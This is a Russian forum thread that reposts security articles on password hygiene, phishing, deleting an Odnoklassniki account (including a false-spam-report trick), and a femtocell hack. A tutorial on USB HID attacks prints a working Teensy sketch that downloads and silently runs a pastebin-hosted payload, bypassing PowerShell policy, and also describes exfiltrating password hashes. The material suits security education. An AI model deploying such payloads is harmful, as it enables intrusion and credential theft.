3. Ради похищения ваших денег - извлекая из вашего компьютера номера кредитных карт (маловероятно, но в жизни все бывает).
4. Чтобы использовать ваш компьютер в роли промежуточного звена или соучастника для другой атаки.
Атаки на чужие компьютеры любят показывать в боевиках невысокого пошиба, где некий юноша, или еще лучше - скромная девица, с обычного ноутбука взламывает сервер Пентагона или отслеживает перемещение денег на конфиденциальных банковских счетах. Выглядит это довольно эффектно, особенно для людей, уверенных в том, что вирусом можно заразиться, если близко подойти к компьютеру ;-). Возможно, и в реальной жизни наблюдение за хакером не лишено драматизма; но довольно часто любители попастись в Интернете за чужой счет делают ставку не на свои знания и умения, а на чужую наивность.
Рецепт до обидного прост: от имени "службы поддержки" вашего провайдера-(или от другой столь же солидной организации) приходит письмо, в котором вас просят срочно выслать свой пароль dial-up-доступа. Они, дескать, проводят плановую проверку. Или ищут злоумышленника. Причин, по которым вас просят выслать пароль, может быть много, а результат один: кто-то будет за ваш счет часами сидеть в Интернете. Посему первое правило гласит:
1. Никогда и никому не высылайте свой пароль доступа в Интернет. При получении писем от провайдера, где это предлагается сделать, немедленно свяжитесь с провайдером - по телефону.
2. Относитесь к паролям с максимальной серьезностью:
- не употребляйте простых, легко подбираемых паролей типа года рождения, имени, фамилии, популярных слов и т.д., и уж тем более не делайте паролем свой логин! В качестве пароля рекомендуется выбирать длинную бессмысленную последовательность символов;
- по возможности, не сохраняйте в системе пароли (не только для установки соединений с Интернетом, но и для электронной почты и др.);
- периодически (раз в 1-2 месяца) меняйте пароль.
3. Не заходите на сайты, где предлагают бесплатный Интернет (не бесплатный e-mail).
4. Не загружайте компоненты ActiveX или Java с чужих веб-страниц.
5. Обращайте внимание на то, что происходит на вашем компьютере во время сеанса связи с Интернетом. Если вы заметите, что в то время, когда вы не выполняете никаких действий с сетью, индикатор активности передачи данных по сети говорит об обратном, немедленно прекращайте связь и проверяйте свой компьютер антивирусными программами. Индикатором активности работы с сетью может служить внешний модем (лампочки мигают) или значок двух соединенных компьютеров, появляющийся при установлении связи внизу на панели задач (также начинающий мигать в момент активной передачи данных).
6. Периодически заходите на сервер статистики, предоставляемый провайдером, и сверяйте время. Если сеанс работы в Интернете пришелся на время, когда вы мирно спали или пребывали в командировке - нужно бить тревогу.
К сожалению, похищением интернет-паролей виртуальное жульничество не исчерпывается; возможности и масштаб мошенничества в Сети заставили бы позеленеть от зависти самого Остапа Бендера.

http://bezpekaua.com/informacionnaya-bezopasnost/104-zashhita-ot-xakerov.html

SAWWA
31.07.2012, 00:39
Надежный пароль для компьютера.
Используйте как можно больше символов. Каждый дополнительный знак увеличивает степень защиты пароля. Пароль должен содержать не менее 8 знаков; 14 знаков и более являются идеальным вариантом.

Так как многие системы позволяют использовать знак пробела при создании пароля, можно составить пароль из нескольких слов — парольную фразу. Такие фразы легче запомнить и труднее подобрать.

Используйте комбинацию из букв, цифр и других символов. Чем больше разных знаков содержит пароль, тем труднее его подобрать. Другие важные сведения:

Чем меньше разных символов вы используете, тем длиннее должен быть ваш пароль. Пароль из 15 случайно выбранных букв и цифр примерно в 33 тысячи раз надежнее, чем пароль из 8 знаков, содержащий разные типы имеющихся на клавиатуре знаков. Если нет возможности включить в пароль символы, следует сделать его значительно длиннее, чтобы обеспечить ту же степень защиты. Идеальный пароль сочетает в себе длину и разнообразие знаков.

Используйте все символы клавиатуры, а не только часто используемые. Цифры и символы, вводимые с помощью клавиши Shift, также часто используются при создании паролей. Пароль будет надежнее, если вы используете все имеющиеся на клавиатуре символы, включая знаки препинания, расположенные не в верхнем ряду клавиатуры, и символы, характерные только для вашего языка.

Используйте слова и фразы, легкие для запоминания, но не очевидные для злоумышленников. Проще всего запомнить пароли и парольные фразы, записав их. Вопреки общепринятому мнению, нет ничего страшного в записи пароля, если данные при этом защищены надлежащим образом.

Пароли, записанные на бумаге, обычно труднее взломать через Интернет, чем пароли, хранящиеся в диспетчере паролей, на веб-узле или в иной программе для хранения данных.
Следуйте этим инструкциям для создания надежного пароля.

1.Придумайте предложение, которое точно не забудете, Это предложение и будет основой для надежного пароля или парольной фразы. Предложение должно быть запоминающимся (например, "Моему сыну Павлу три года").
2.Убедитесь, что выбранная вами система проверки пароля допускает использование идентификационных фраз. Если имеется возможность использовать парольные фразы (с пробелами между знаками), воспользуйтесь ею.
3.Если использование идентификационных фраз недопустимо в данной системе, воспользуйтесь обычным паролем. Составьте новое бессмысленное слово из первых букв всех слов, входящих в созданное предложение. В нашем примере получится: "мсптг".
4.Усложните комбинацию, используя заглавные буквы, строчные буквы и цифры. Можно поменять местами буквы в слове или намеренно допустить орфографические ошибки. Например, в парольной фразе, приведенной выше, можно допустить ошибку в имени или заменить слово "три" на цифру 3. Имеется множество возможных подстановок, и чем длиннее предложение, тем более надежным будет пароль. Наш пример можно преобразовать так: "Моему сыНу Па8лУ 3 годА". Если компьютер или система не поддерживают парольные фразы, тот же метод можно применить и к простому паролю. Например, "мСп3Г".
5.Наконец, замените отдельные символы. Можно использовать знаки, похожие на буквы, объединять слова (удаляя пробел между ними) и т. п. Следуя нашему примеру, мы получаем: "Моему $ыНуП@в8лУ 3 годА" или "м$п3Г!".
6.Проверьте свой новый пароль с помощью программы проверки паролей. Программа проверки паролей на данном веб-узле определит надежность выбранного пароля, как только вы его введете и не сохраните при этом.

Методы создания пароля, которые не следует использовать.

Существуют общепринятые методы, о которых могут знать и злоумышленники. Во избежание создания ненадежного пароля
•не используйте последовательные комбинации и повторяющиеся символы. Такие сочетания (например, "12345678", "222222", "abcdefg" или сочетания соседних букв на клавиатуре) не являются надежными паролями.
•Избегайте использования только замен похожих цифр и символов. Преступников и иных злоумышленников, обладающих достаточными знаниями для подбора и взлома пароля, не удастся ввести в заблуждение подобными заменами, например "i" на "1" или "а" на "@" в словах "M1cr0$0ft" или "П@р0ль". Однако не стоит пренебрегать такими заменами в сочетании с другими методами повышения надежности пароля, такими как увеличение длины, неправильное написание, использование заглавных и строчных букв.
•Не применяйте свое имя пользователя в качестве пароля. Избегайте также использования иных личных данных (своих или своих близких), таких как имя, дата рождения, код социального страхования и т. д. Эти сведения используются злоумышленниками в первую очередь.
•Избегайте словарных слов на любом языке. Злоумышленники обладают совершенными средствами, позволяющими быстро подобрать пароли, в основе которых лежат слова из разных языков; слова, написанные задом наперед; распространенные орфографические ошибки и замены, а также все виды ругательств и других слов, которые не произносят при детях.
•Используйте несколько паролей. При взломе одного компьютера или системы, где используется определенный пароль, опасности подвергаются все прочие данные, защищенные тем же паролем. Настоятельно рекомендуется использовать разные пароли для различных систем.
•Не сохраняйте пароль в Интернете. Злоумышленник, получивший доступ к вашему паролю в Интернете или в компьютерной сети, получает доступ ко всем данным.

Использование пустого пароля

Пустой пароль (отсутствие пароля) более эффективен, чем ненадежный, такой как, например, "1234". Простой пароль легко разгадать, но на компьютерах с Windows XP к учетной записи, не защищенной паролем, нельзя получить доступ через локальную сеть или Интернет (данная функция недоступна в ОС Microsoft Windows 2000, Windows Me и в более ранних версиях). Пустой пароль для учетной записи на компьютере можно использовать, если выполнены перечисленные ниже требования.
•У вас один или несколько компьютеров, но вам не нужен доступ с одного компьютера на другой.
•Ваш компьютер физически защищен (вы доверяете всем, кто имеет доступ к вашему компьютеру).

Не всегда рекомендуется использовать пустой пароль. Например, переносной компьютер скорее всего физически не защищен, и на нем лучше использовать надежный пароль.

Доступ к паролям и их изменение

Учетные записи в Интернете
Веб-узлы имеют различные политики, регулирующие доступ к учетной записи и изменение пароля. На домашней странице веб-узла найдите ссылку (например "Учетная запись"), служащую для перехода на страницу веб-узла, где выполняется управление паролем и учетной записью.

Пароли на компьютере
Сведения о создании и изменении учетных записей, защищенных паролями, а также о доступе к ним и о том, как установить защиту паролем при загрузке компьютера, обычно имеются в файлах справки операционной системы. Можно также попытаться найти эти сведения на веб-узле производителя программного обеспечения. Например, в ОС Microsoft Windows XP сведения об управлении паролями, их изменении и т. д. можно найти в системе интерактивной справки.

Хранение паролей в секрете

Относитесь к паролям и парольным фразам так же серьезно, как к данным, которые они защищают.

•Никому не сообщайте пароль. Держите пароль в секрете от своих близких (особенно от детей) и друзей, которые могут сообщить его кому-либо еще. Исключением являются пароли, которые необходимо знать вашим близким, например пароль к вашему банковскому счету в Интернете, который можно сообщить жене или мужу.
•Храните пароль в надежном месте. Будьте внимательны, если записали пароль на бумаге или какой-либо другой носитель. Не оставляйте записку с паролем там, где вы не оставили бы данные, которые он защищает.
•Никогда не пересылайте пароль по электронной почте. Любое сообщение электронной почты, содержащее запрос пароля или требующее перейти на веб-узел для подтверждения пароля, почти наверняка является мошенническим. Это относится и к сообщениям такого типа, полученным от надежной компании или человека. Сообщение электронной почты может быть перехвачено, а отправитель запроса может быть совсем не тем, за кого себя выдает. В фишинг-аферах используются мошеннические сообщения электронной почты, обманным путем заставляющие раскрыть имя пользователя и пароль и позволяющие злоумышленникам завладеть идентификационными данными и т. п. Дополнительные сведения о фишинг-аферах и о защите от мошенничества в Интернете.
•Регулярно меняйте пароли. Это поможет ввести злоумышленников в заблуждение. Чем надежнее пароль, тем дольше можно его использовать. Пароль из 8 знаков или менее можно применять в течение недели, в то время как сочетание из 14 и более знаков может служить несколько лет, если оно составлено по всем правилам, приведенным выше.
•Не вводите пароли на чужих компьютерах. Компьютеры в интернет-кафе и лабораториях, системы общего доступа, интерактивные терминалы, а также компьютеры на конференциях и в залах ожидания аэропортов не могут считаться безопасными и подходят только анонимного выхода в Интернет. Не пользуйтесь такими компьютерами для проверки электронной почты, банковского счета, доступа в виртуальные комнаты для разговоров и доступа к другим учетным записям, где запрашивается имя пользователя и пароль.
Злоумышленники применяют недорогие и быстро устанавливающиеся устройства, записывающие последовательность нажатий на клавиши. Такие устройства позволяют мошенникам получать через Интернет все данные, введенные в компьютер. Помните, что ваши пароли и парольные фразы так же важны, как и данные, которые они защищают.

Действия в случае хищения пароля

Отслеживайте все данные, защищенные паролями: финансовые отчеты за месяц, отчеты о кредитных операциях, данные о покупках через Интернет и т. д. Надежные, легко запоминающиеся пароли помогают защититься от мошенничества и хищения идентификационных данных, но не являются абсолютной гарантией защиты. Вне зависимости от того, насколько надежным является пароль, если мошенникам удастся взломать систему, где он хранится, они его узнают. Если вы заметили подозрительные действия, которые могут означать, что кто-то получил доступ к вашим данным, как можно скорее сообщите об этом в соответствующие органы. Дополнительные сведения о действиях в случае хищения идентификационных данных или подобного мошенничества.

http://bezpekaua.com/informacionnaya-bezopasnost/zashhita-informacii/424-nadezhnyj-parol-dlya-kompyutera.html

SAWWA
31.07.2012, 00:41
Как безопасно удалиться с Одноклассников.ру?

Как безопасно удалить свою страничку с Одноклассников?И почему так сложно это сделать?Все просто,чем больше людей зарегистрировано-тем выше рейтинг сайта в интернете.И совсем не важно пользуются люди своей страничкой или нет.Как правило,на самом сайте нет информации о том,как удалить свою страницу.Плюс к этому умершие люди ,данные о которых не известны тоже продолжают оставаться в социальных сетях.Администрация сайта не проводит проверку активности пользователей и соответственно проверить сколько людей не посещают сайт годами невозможно.

Некоторые пользователи регистрируются несколько раз ,используя различные почтовые ящики.Причин может быть множество-забыли пароль, невозможно зайти на свою страницу, так как происходит сбой, взломали аккаунт и т.д
Таким образом, на портале может быть несколько десятков тысяч людей «клонов». Однако удалить свои прежние данные крайне сложно, не обладая специальными знаниями.

Открытость информации также может сыграть с вами злую шутку. Нередки случаи, когда фотографии людей с привлекательной внешностью появлялись на сайтах знакомств, порно-сайтах, порталах, предлагающих людям интим-услуги и т.д. К сожалению, сегодня никто не несет ответственности за распространение личной информации о пользователях социальных сетей по Интернету. Именно поэтому необходимо внимательно следить за тем, какие данные о себе вы оставляете в виртуальном пространстве, а также максимально быстро удалять свой аккаунт с сайтов, если в этом возникла острая необходимость.
Настройки. Вы удаляете страницу самостоятельно. Для этого заходите в раздел «Моя страница», потом переходите «Редактировать личные данные» и после этого нажимаете подтверждение того, что желаете удалить свой профайл с сайта. После данных действий вам будет предложено указать свой пароль и адрес электронной почты. Через несколько секунд на почту придет письмо с просьбой подтвердить ваше намерение удалить свою страницу с сайта. Стоит отметить, что после данного удаления, вы уже не сможете зарегистрироваться на Одноклассниках с указанного почтового адреса.

Помощь админов. Обратитесь за помощью к администрации сайта. Для этого вам необходимо связаться с менеджерами и озвучить свой вопрос. Не забывайте о разнице в часовых поясах. Специалисты сайта могут не находиться круглосуточно в сети, поэтому будьте готовы к тому, что ответ придется подождать некоторое время. Это не общение по ICQ, где ответ приходит в считанные секунды, это диалог со специалистом, который в течение одного дня отвечает на огромное количество подобных вопросов. Однако, как показывает практика, очень редко данный вопрос находит ответ. Это связано с тем, что администрации сайта не выгодно терять пользователей социальной сети. Поэтому специалисты могут тянуть время, не давать точных и четких ответов, просить подождать несколько дней для уточнения информации и т.д.

Активация профайла на друга или знакомого. Порою, возникает достаточно комичная ситуация. Предположим, вы не можете удалить свою страницу с сайта, а ваш знакомый не может пройти регистрацию. В этом случае автор страницы на Одноклассниках удаляет свои личные данные, друзей, фотографии, и отдает страницу знакомому. Тот вносит свои персональные сведения, и пользуется социальной сетью.

Пустая страница. Некоторые пользователи идут по пути наименьшего сопротивления. Кому будет нужна ваша страница, если на ней не будет абсолютно никаких сведений? Удаляете фотографию, имя, фамилию, организации, личные сведения, друзей. В общем, делаете страницу такой, какая она была после вашей первоначальной регистрации. Теперь закрываете доступ к профайлу для всех кроме друзей. Так как друзей у вас нет (вы их удалили), теперь никто не сможет к вам зайти, так как никаких опознавательных знаков о том, что пустая страницы является вашей, нет.

Почувствуйте себя программистом. В вашем браузере в конце адресной строки введите следующее: &st.layer.cmd=PopLayerDeleteUserProfile. Тогда появится окно, в котором вам будет предложено ввести свой пароль, и нажать кнопку «Удалить».

Отказываемся от услуг. Заходим на страницу под своим именем. В самом конце профиля находим раздел «Правила». Заходим туда и ставим галочку напротив раздела «Отказаться от услуг». Вводим пароль от страницы в Одноклассниках. После этого ждем письмо на электронную почту с подтверждением удаления страницы.
Недавно этот раздел стал называться "Регламент"-там необходимо выбрать-"Отказаться от услуг".

Хитрость. Всем известно, что страница, с которой рассылается спам, автоматически удаляется модераторами. Попросите знакомых, а те в свою очередь своих знакомых указать на то, что с вашей страницы рассылается спам. После того, как администрации сайта придет несколько десятков предупреждений о том, что от вас идет массовая рассылка, вашу страницу автоматически заблокируют.


Если вы забыли свой пароль и не можете его восстановить, то для удаления своего аккаунта необходимо написать письмо в администрацию сайта ,где у вас потребуют скан паспорта:

"Вас приветствует Служба поддержки Odnoklassniki.ru!
Для удаления акаунта нам необходим скан паспорта, подтверждающий Ваши права на
эту страницу.""Вас приветствует Служба поддержки Odnoklassniki.ru!
Для удаления акаунта нам необходим скан паспорта, подтверждающий Ваши права на
эту страницу."

http://bezpekaua.com/informacionnaya-bezopasnost/rabota-v-internete/1493-kak-bezopasno-udalitsya-s-odnoklassnikovru.html

SAWWA
20.07.2013, 02:15
USB-троян
//28.01.2013 http://www.xakep.ru/post/60017/
Зловредные USB-устройства за 24 доллара
http://www.zamkidveri.com/forum/images/imported/2013/07/0-1.jpg
У современных ОС есть интересная особенность — они полностью доверяют устройствам вроде клавиатуры или мыши. Соответственно, если собрать девайс, который будет эмулировать нужный ввод, и подключить его к компьютеру, то можно творить все что угодно. Этим и пользуются злоумышленники.
WARNING

Информация представлена исключительно в образовательных целях. Любое ее использование в неправомерных целях может караться по всей строгости закона РФ (статьи 272 и 273 Уголовного кодекса). Ни автор, ни редакция в этом случае ответственности не несут. Думай головой.
Маленький пример

Начну с небольшой демонстрации. Представь: специалист по безопасности проводит внутренний пентест в некоторой компании и видит, что один из сотрудников часто оставляет станцию незалоченной. Очевидный путь — подойти и выполнить несколько «злобных» команд, пока этого никто не видит. Однако есть серьезный риск быть пойманным за чужим рабочим местом да еще набирающим что-то непонятное в черном окне консоли :). А если бы у исследователя было устройство, которое при подключении само бы набирало заранее запрограммированные команды? Подойти и незаметно вставить такой девайс — уже не слишком большая проблема. Или другой пример. Пусть это будет уже злоумышленник, у которого нет физического доступа к компьютерам. Если замаскировать девайс под видом мышки, флешки или 3G-модема, то есть шанс, что его без лишней помощи вставит кто-то из самих же сотрудников. Известны случаи, когда такие «протрояненные» девайсы отправлялись просто по почте в качестве сувенирки. Процент пользователей, которые, не подозревая о подвохе, подключают устройство к компьютеру, достаточно высок. При этом ни система, ни, к примеру, антивирус не замечают подвоха — для них это обычная клавиатура. Почему так происходит?
HID-устройства

Для начала надо разобраться с понятием Human Interface Device, или HID. В Википедии говорится, что HID — тип компьютерного устройства, которое взаимодействует напрямую с человеком, наиболее часто принимает входные данные от человека и предоставляет ему выходные данные. Самые распространенные типы HID-устройств — это клавиатуры, мыши и джойстики. С точки зрения компьютерной системы HID-устройства являются полностью доверенными и в основном рассматриваются как простой интерфейс между пользователем и машиной. Когда ты вставляешь в компьютер новую клавиатуру и мышь, никто у тебя не спрашивает разрешения на их установку, а драйверы чаще всего устанавливаются автоматически. Такое безграничное доверие может выйти боком для пользователя и давно замечено специалистами по информационной безопасности. Еще в 2010 году на хакерской конференции DEFCON небезызвестные Irongeek и Dave ReL1k подробно рассказывали об использовании HID-устройств для проверки безопасности систем. С тех пор в плане защиты не изменилось ровным счетом ничего. И собрать девайс, который под видом клавиатуры будет выполнять запрограммированные действия, ничто не мешает и сейчас, в чем я убедился в рамках моего исследования.
Плата Teensy

За основу такого USB-девайса была выбрана плата Teensy++ 2.0. Это программируемый микроконтроллер, который изначально идет вместе с полноценным USB-портом. Среди примеров использования Teensy, в огромном количестве собранных на официальном сайте, — LED-футболка, которая с помощью диодов выводит различные изображения, станок для рисования маркером, наносящим нужный рисунок на любую ровную поверхность, считыватель RFID-карточек, детектор движения и еще десятки полезного и не очень «самопала». Ты наверняка слышал о платах Arduino и ее аналогах, так вот Teensy — очень похожий проект. Но что важно для моей задачи: на Teensy чрезвычайно просто реализовать HID-устройство, которое будет определяться системой как клавиатура или, к примеру, мышь. Поскольку плата изначально снабжена USB-портом, то мне даже не пришлось брать в руки паяльник и выполнять какие-либо хардкорные вмешательства. Все, что было нужно, — написать правильную программу. Замечу, что у платы есть несколько версий, но я выбрал самую навороченную и дорогую — Teensy++ 2.0. Ее можно заказать на официальном сайте проекта pjrc.com всего за 24 доллара.
Ограничения Teensy

Есть один нюанс, который сильно усложняет Teensy жизнь. Поскольку мы используем эмуляцию HID-устройства, то мы можем говорить с системой, но не можем ее услышать. Это основное ограничение при написании пэйлоадов для Teensy, которое делает пэйлоады менее чувствительными к состоянию системы. Разработчику боевых нагрузок придется заранее определить все возможные ситуации и реакцию системы, потому что во время выполнения прочитать ответ системы будет невозможно. Единственная вещь, которую Teensy может считать, когда используется в качестве клавиатуры, — это состояние кнопок CAPS, NUM и SCROLL. Еще одним ограничением является маленький размер памяти устройства, но с этим можно жить, особенно если подключить к Teensy дополнительный носитель данных, например SD-карту.
Hello world для железки

Teensy, как и платы Arduino, использует похожий процессор Atmel AVR, поэтому можно взять ту же среду разработки — Arduino Development Environment (arduino.cc), ее также называют ADE. Последняя бесплатно доступна для всех популярных ОС (Windows, Linux, Mac OS X) и, помимо редактирования кода, позволяет залить программу в микроконтроллер. Чтобы полноценно использовать ее для работы с Teensy, необходимо также установить дополнительный аддон Teensyduino (pjrc.com/teensy/teensyduino.html). Надстройка, в частности, сразу предоставляет возможность перевести Teensy в режим эмуляции клавиатуры: это делается в ADE через меню «Tools --> Boards --> USB Keyboard». Если вставить девайс в компьютер, то он сразу определится как клава. Однако происходить ничего не будет — пока ничего не запрограммировано.
Что представляет собой программа или, как ее называют в здешней терминологии, скетч для Teensy? Разработка осуществляется с помощью С-подобного синтаксиса. Программисту доступны переменные, методы, условные операторы, указатели — короче говоря, все, что нужно для счастья. Любой скетч должен содержать функции setup() и loop(): первая вызывается один раз во время запуска, а вторая в цикле выполняет написанный внутри нее код. Функции могут быть даже пустыми, однако присутствовать должны — иначе компиляция будет завершаться неудачей. Приведу пример простейшего кода:
int count = 0;
void setup() { }
void loop() {
Keyboard.print("Hello World ");
delay(5000);
}

Как видишь, для эмуляции ввода используется уже готовая функция Keyboard.print(). Причем ввод будет повторяться, потому что вызов осуществляется из функции loop(). Задержка, реализованная с помощью delay(), нужна для того, чтобы повторение ввода не происходило слишком быстро. В документации подробнейшим образом описываются более сложные случаи эмуляции и клавиатуры, и мышки, и джойстика — я же на этом описание программирования Teensy закончу. В ходе своего исследования я уже создал все необходимые скетчи, которые могут понадобиться пентестеру, и оформил их в виде готового набора инструментов Kautilya (code.google.com/p/kautilya), который доступен с открытыми исходниками всем желающим.
Тулкит Kautilya

В ходе лекций о Teensy я заметил, что очень часто у пентестеров банально не хватает времени для программирования микроконтроллера под свои нужды. В результате они просто отказываются от этого инструмента. Я решил максимально упростить задачу и написал на Ruby скрипт, спрашивающий некоторые параметры и на выходе выдающий готовый скетч, который можно загрузить в Teensy. Благодаря этому снабдить микроконтроллер боевой нагрузкой можно вообще без знания о том, как пишутся программы для микроконтроллера.

http://www.zamkidveri.com/forum/images/imported/2013/07/2-1.jpg
Управление тулкитом Kautilya осуществляется через консольное меню

Чтобы лучше понимать, что зашито внутри Kautilya, предлагаю рассмотреть, как бы выглядел пентест Windows 7 машины с помощью HID-устройства, если бы необходимо было начинать с нуля. Скорее всего, это были бы следующие этапы:

1. Распознать операционную систему с точки зрения USB-буфера.
2. Выяснить поддерживаемые команды и научиться с их помощью реализовывать нужные нам действия в системе с помощью PowerShell- и/или VBS-скриптов.
3. Определить встроенные механизмы безопасности (такие как UAC и политика запуска PowerShell-скриптов), которые могут проверять привилегированные команды, и затем найти способ их обходить.
4. Узнать время, затрачиваемое ОС на выполнение различных команд.
5. Записать команды и скрипты на плату Teensy.
6. Узнать, какие фокусы может выкинуть командная строка, когда Teensy будет передавать команды (эмулировать ввод с клавиатуры) на машину жертвы.
7. Постараться быть как можно незаметней на компьютере жертвы.
8. Протестировать пэйлоад и сделать окончательный скетч.
9. Скомпилировать скетч и залить на Teensy.
10. Присоединить девайс к машине жертвы или сделать так, чтобы она сделала это сама (например, с помощью социальной инженерии).
11. Получить результат :).

INFO

Автор этой статьи живет в Индии, а тулкит Kautilya назван в честь индийского стратега, экономиста и политолога Чанакья (Каутилья — один из его псевдонимов).

Следующие несколько строк могут выглядеть как самореклама ;). Kautilya автоматизирует шаги с первого по восьмой. Другими словами, с использованием тулкита исследователю достаточно:

1. Выбрать через консольное меню Kautilya готовую боевую нагрузку и указать опции — в результате будет сгенерирован готовый скетч (*.ino или *.pde файл).
2. Залить скетч на плату Teensy.
3. Присоединить девайс к машине-жертве.
4. Наслаждаться победой!

В настоящий момент тулкит содержит в себе пэйлоады для Windows 7 и Linux (протестирован на Ubuntu 11.4). Чтобы не быть голословным, предлагаю изучить некоторые из них и посмотреть, как они работают, если на машине жертвы используется Windows 7.

http://www.zamkidveri.com/forum/images/imported/2013/07/3-1.jpg
Создаем скетч для дампа пользовательских паролей
Есть ли способ защититься?

Я вижу два основных способа защиты от подобных атак на Windows-системах:

1. Запретить установку съемных устройств — это можно сделать с помощью групповой политики безопасности (gpedit.msc) как для локальной машины, так и для рабочих станций в домене. Если перейти в «Административные шаблоны --> Система --> Установка устройства --> Ограничения на установку устройств», то ты увидишь различные настройки для ограничения установки устройств. Я бы рекомендовал включить опцию «Запретить установку съемных устройств», после этого ни одно устройство подключить к системе будет уже нельзя. Кроме того, запрещено будет и обновление драйверов для уже установленных устройств. Установить новое устройство сможет только администратор, да и то только после активации опции «Разрешить администраторам заменять политики ограничения установки устройств». Имей в виду: если речь идет об организации, то это непременно обернется кошмаром для пользователей, которые, не обнаружив привычный Plug'n'Play, сразу же замучают админа просьбами посмотреть их компьютер. А что делать?
2. Поступить радикально и запретить физический доступ к USB-портам. К сожалению, чаще всего это не представляется возможным — в большой компании всегда останется лазейка. Некоторые производители материнских плат заявляют, что их защитные решения умеют блокировать подобные зловредные устройства (в том числе собранные на базе Teensy). Но я бы рекомендовал не сильно доверять подобным заявлениям: проверял я тут одну защиту, и она была бесполезна чуть больше чем полностью.

http://www.zamkidveri.com/forum/images/imported/2013/07/5-1.jpg
Запрещаем установку внешних устройств для предотвращения атак через USB-устройства
Примеры использования

Payload: скачать и выполнить

Как я уже говорил, боевая нагрузка выбирается через консольное меню Kautilya. Один из простых пэйлоадов — Download and Execute, который загружает файл из интернета и запускает его на целевой системе. Естественно, при создании программы для микроконтроллера необходимо указать, откуда этот файл нужно взять. Интересно, что для хостинга бинарника предлагается разместить его на сервисе Pastebin.com, предварительно обработав его для хранения в текстовом виде, а для соответствующей конвертации пригодится специальный скрипт exetotext.ps1, который лежит в папке Kautilya/extras. В момент выполнения на машине-жертве программа скачивает текстовый файл, преобразует его обратно в исполняемый exe’шник и выполняет его в фоновом режиме. Это может быть windows reverse meterpreter (по сути, реверс-шелл): если подключить девайс с таким скетчем к исследуемому компьютеру, то пентестер очень скоро получит meterpreter-сессию. Причем нагрузка умеет обходить execution policy и не отображает никаких окон на целевом компьютере.

Интересно рассмотреть, что все-таки генерирует Kautilya. Приведу ниже скрипт, поясняя важные моменты небольшими комментариями:

void setup() {
delay(5000);
// Задержка в 5 секунд необходима, чтобы Windows 7 подготовилась для работы с устройством

run("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\"");
// Открываем окно консоли очень маленького размера с заголовком Installing Drivers

delay(3000);

Keyboard.println("echo $webclient = New-Object System.Net.WebClient > %temp%\\download.ps1");
// Создаем объект класса WebClient

Keyboard.println("echo $url = \"http://pastebin.com/raw.php?i=NfiBdUp9\" >> %temp%\\download.ps1");
// Pastebin URL в raw-формате, который был передан в качестве опции Katuilya

Keyboard.println("echo [string]$hex = $webClient.DownloadString($url) >> %temp%\\download.ps1");
// Загружаем текст в hex-формате

Keyboard.println("echo [Byte[]] $temp = $hex -split ' ' >> %temp%\\download.ps1");
// Переводим hex в bytes

Keyboard.println("echo [System.IO.File]::WriteAllBytes(\"%TEMP%\\payload.exe\", $temp) >> %temp%\\download.ps1");
// Записываем полученные байты в exe-файл

Keyboard.println("echo start-process -nonewwindow \"%TEMP%\\payload.exe\" >> %temp%\\download.ps1");
// Незаметно выполняем payload.exe

delay(2000);

Keyboard.println("echo Set oShell = CreateObject(\"WScript.Shell\") > %temp%\\download.vbs");

Keyboard.println("echo oShell.Run(\"powershell.exe -ExecutionPolicy Bypass -noLogo -command %temp%\\download.ps1\"),0,true >> %temp%\\download.vbs");
// Выполняем PowerShell-скрипт из vbs, который обходит execution policy и не отображает никаких окон на компьютере-жертве

delay(1000);

Keyboard.println("wscript %temp%\\download.vbs");

delay(3000);

Keyboard.println("exit");
// Закрываем окно терминала
}

void loop(){
// loop-функция необходима в скетче
}

void run(char *SomeCommand){
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
// Эмулируем нажатие клавиши Windows

Keyboard.set_key1(KEY_R);
// Эмулируем нажатие клавиши <R>

Keyboard.send_now();
// Посылаем комбинацию клавиш <Windows>+<R>, которая открывает окно "Выполнить"

delay(1500);
Keyboard.set_modifier(0);
// Эмулируем отпускание клавиши <Windows>

Keyboard.set_key1(0);
// Эмулируем отпускание клавиши <R>

Keyboard.send_now();
// Отпускаем <Windows> и <R>

Keyboard.print(SomeCommand);
// Вводим переданный аргумент SomeCommand в окне "Выполнить"
Keyboard.set_key1(KEY_ENTER);

Keyboard.send_now();

Keyboard.set_key1(0);

Keyboard.send_now();
}

Еще раз поясню: этот сгенерированный скрипт сразу готов для загрузки на Teensy через среду разработки Arduino Development Environment.

Payload: сдампить хеши паролей

Другой пэйлоад может быть использован для дампа хешей паролей с Windows 7 машины. Для того чтобы его применить, исследователю необходимо предварительно загрузить скрипт powerdump meterpreter из метасплойта на Pastebin, откуда он будет впоследствии загружен на жертву. Как известно, этот скрипт работает только с привилегиями SYSTEM, которые можно получить, если добавить задание в стандартный планировщик задач. Однако этот старый добрый трюк сработает только из-под аккаунта администратора. Чтобы передать полученные данные, скетч опять же использует сервис Pastebin, но не раскрывает хеши для всех подряд — вместо этого он публикует их в виде приватного поста (недоступен для посторонних). Правда, для этого предварительно нужно зарегистрироваться в сервисе и получить свой ключ разработчика (api developer key), который скетч будет использовать для публикации данных. Логин/пароль и ключ для Pastebin, а также имя задачи планировщика — все это, само собой, запросит Kautilya при создании программы для Teensy. Если залить полученный скетч и вставить в компьютер пользователя, который работает с правами администратора, то на Pastebin.com очень скоро окажутся хеши пользовательских паролей, которые часто брутятся.

SAWWA
21.07.2013, 01:40
Взлом фемтосот для прослушивания абонентов сотовой сети
http://www.xakep.ru/post/60930/default.asp
Специалисты по безопасности из компании iSEC Partners сумели взломать популярные в США фемтосоты от оператора сотовой связи Verizon. С помощью этих устройств осуществляется усиление сигнала сотовой связи внутри помещений, но хакеры могут использовать их для перехвата чужих коммуникаций.

Эта новость особенно забавно выглядит именно сейчас, когда оператор Verizon находится в центре скандала из-за передачи метаданных о звонках всех своих абонентов в АНБ. Оказывается, прослушивать пользователей могут не только спецслужбы.

Более подробно о методах взлома фемтоcот для сотовой связи исследователи расскажут на хакерской конференции Black Hat, которая начнется 27 июля в Лас-Вегасе. Официальное описание уязвимости с получением рутового доступа через прерывание SysReq см. здесь (требуется физический доступ к фемтосоте для подключения кабеля).
31125
Verizon Wireless Network Extender SCS-26UC4

Компания Verizon уведомлена об уязвимости и уже выпустила новые версии прошивок для моделей Verizon Wireless Network Extender SCS-26UC4 и SCS-2U01, обе производства Samsung. Однако, авторы работы говорят, что аналогичная уязвимость может присутствовать приблизительно в 30 моделях фемтосот других производителей.

SAWWA
22.07.2013, 15:00
Газель + Bluetooth = развод через SMS


